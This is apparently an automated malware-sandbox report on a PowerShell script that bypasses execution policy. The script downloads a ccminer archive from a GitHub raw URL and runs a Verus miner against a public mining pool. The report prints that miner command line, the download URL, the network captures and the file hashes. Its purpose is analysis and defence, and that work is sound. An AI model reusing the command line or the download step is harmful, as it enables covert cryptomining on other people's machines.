Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

windows.ps1

windows10-1703-x64

8

windows.ps1

windows10-2004-x64

8

windows.ps1

windows11-21h2-x64

8

Analysis

  • max time kernel
    315s
  • max time network
    1800s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    20/07/2024, 14:44 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    windows.ps1

  • Size

    467B

  • MD5

    63f6c82077c4c39d6d9101409b16a668

  • SHA1

    09d1960993c90f39607f437a2106b65db7aeae29

  • SHA256

    18284686feab2a0753bd0059a64004d8b86bb47048065cba12d323efbb6cc891

  • SHA512

    3bbf47af04fae3e7fd921bf1319e652c879d6132d4ea495cb7d6f47a38b9a4fb09f7be4af14c2d0c7357febd893c16639268dc82ec3b9194d0d4dc54723e1a34

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe
      "C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe" -a verus -o stratum+tcp://de.vipor.net:5040 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Windows -p x -t 2
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        3⤵
          PID:4160

    Network

    • flag-us
      DNS
      raw.githubusercontent.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      raw.githubusercontent.com
      IN A
      Response
      raw.githubusercontent.com
      IN A
      185.199.110.133
      raw.githubusercontent.com
      IN A
      185.199.111.133
      raw.githubusercontent.com
      IN A
      185.199.108.133
      raw.githubusercontent.com
      IN A
      185.199.109.133
    • flag-us
      GET
      https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip
      powershell.exe
      Remote address:
      185.199.110.133:443
      Request
      GET /MomboteQ/mining-scripts/main/verus/ccminer-win.zip HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
      Host: raw.githubusercontent.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Connection: keep-alive
      Content-Length: 1412223
      Cache-Control: max-age=300
      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
      Content-Type: application/zip
      ETag: "19ccc6d11b3c33e877316ccc6d2b2e4b2ed7138fc831e088812c7f6a799d516d"
      Strict-Transport-Security: max-age=31536000
      X-Content-Type-Options: nosniff
      X-Frame-Options: deny
      X-XSS-Protection: 1; mode=block
      X-GitHub-Request-Id: 871F:2D46DF:617E28:79271D:669BE38E
      Accept-Ranges: bytes
      Date: Sat, 20 Jul 2024 16:21:02 GMT
      Via: 1.1 varnish
      X-Served-By: cache-lcy-eglc8600075-LCY
      X-Cache: HIT
      X-Cache-Hits: 2
      X-Timer: S1721492463.835553,VS0,VE0
      Vary: Authorization,Accept-Encoding,Origin
      Access-Control-Allow-Origin: *
      Cross-Origin-Resource-Policy: cross-origin
      X-Fastly-Request-ID: 53e1f9ef934c70a360b7c77bf1ad133886f91c10
      Expires: Sat, 20 Jul 2024 16:26:02 GMT
      Source-Age: 95
    • flag-us
      DNS
      133.110.199.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.110.199.185.in-addr.arpa
      IN PTR
      Response
      133.110.199.185.in-addr.arpa
      IN PTR
      cdn-185-199-110-133githubcom
    • flag-us
      DNS
      de.vipor.net
      ccminer.exe
      Remote address:
      8.8.8.8:53
      Request
      de.vipor.net
      IN A
      Response
      de.vipor.net
      IN CNAME
      de.vipordns.net
      de.vipordns.net
      IN A
      51.195.34.205
    • flag-us
      DNS
      205.34.195.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      205.34.195.51.in-addr.arpa
      IN PTR
      Response
      205.34.195.51.in-addr.arpa
      IN PTR
      ip205 ip-51-195-34eu
    • flag-us
      DNS
      29.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      29.243.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      31.73.42.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      31.73.42.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      240.143.123.92.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      240.143.123.92.in-addr.arpa
      IN PTR
      Response
      240.143.123.92.in-addr.arpa
      IN PTR
      a92-123-143-240deploystaticakamaitechnologiescom
    • 199.232.210.172:80
      322 B
       7
    • 199.232.210.172:80
      322 B
       7
    • 185.199.110.133:443
      https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip
      tls, http
      powershell.exe
      26.9kB
       1.5MB
       567
      1062

      HTTP Request

      GET https://raw.githubusercontent.com/MomboteQ/mining-scripts/main/verus/ccminer-win.zip

      HTTP Response

      200
    • 51.195.34.205:5040
      de.vipor.net
      ccminer.exe
      253.0kB
       58.6kB
       412
      252
    • 8.8.8.8:53
      raw.githubusercontent.com
      dns
      powershell.exe
      71 B
       135 B
       1
      1

      DNS Request

      raw.githubusercontent.com

      DNS Response

      185.199.110.133
      185.199.111.133
      185.199.108.133
      185.199.109.133

    • 8.8.8.8:53
      133.110.199.185.in-addr.arpa
      dns
      74 B
       118 B
       1
      1

      DNS Request

      133.110.199.185.in-addr.arpa

    • 8.8.8.8:53
      de.vipor.net
      dns
      ccminer.exe
      58 B
       100 B
       1
      1

      DNS Request

      de.vipor.net

      DNS Response

      51.195.34.205

    • 8.8.8.8:53
      205.34.195.51.in-addr.arpa
      dns
      72 B
       107 B
       1
      1

      DNS Request

      205.34.195.51.in-addr.arpa

    • 8.8.8.8:53
      29.243.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      29.243.111.52.in-addr.arpa

    • 8.8.8.8:53
      31.73.42.20.in-addr.arpa
      dns
      70 B
       156 B
       1
      1

      DNS Request

      31.73.42.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      240.143.123.92.in-addr.arpa
      dns
      73 B
       139 B
       1
      1

      DNS Request

      240.143.123.92.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsfoannb.gth.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\ccminer\ccminer\ccminer.exe
      Filesize

      652KB

      MD5

      153e4364a395b282b983dfc2c5884105

      SHA1

      9147a6afa63bd7d7e451c693e362730c692781e1

      SHA256

      6a1077166de9d1cc6fceaf6da6f8c5e1c8d9d5f99f3ab845b9790fc6d395d896

      SHA512

      378fe8b9ae243d5844243999a909ab45216920d63149b39be521e5212533f0dc30e8620c6285738e1100618f44d1576b3ccd9aa27b0e65b29a3ca1937047173d

      Download Submit

    • memory/4472-175-0x000001DD3D8F0000-0x000001DD3D91A000-memory.dmp

      Filesize

      168KB

      Download

    • memory/4472-10-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4472-9-0x000001DD3D940000-0x000001DD3D9B6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4472-8-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4472-2-0x00007FF8EE9D3000-0x00007FF8EE9D4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4472-194-0x000001DD3D8F0000-0x000001DD3D912000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4472-207-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4472-230-0x000001DD3D920000-0x000001DD3D932000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4472-243-0x000001DD3D910000-0x000001DD3D91A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4472-5-0x000001DD3D790000-0x000001DD3D7B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4472-258-0x00007FF8EE9D3000-0x00007FF8EE9D4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4472-259-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4472-260-0x00007FF8EE9D0000-0x00007FF8EF3BC000-memory.dmp

      Filesize

      9.9MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.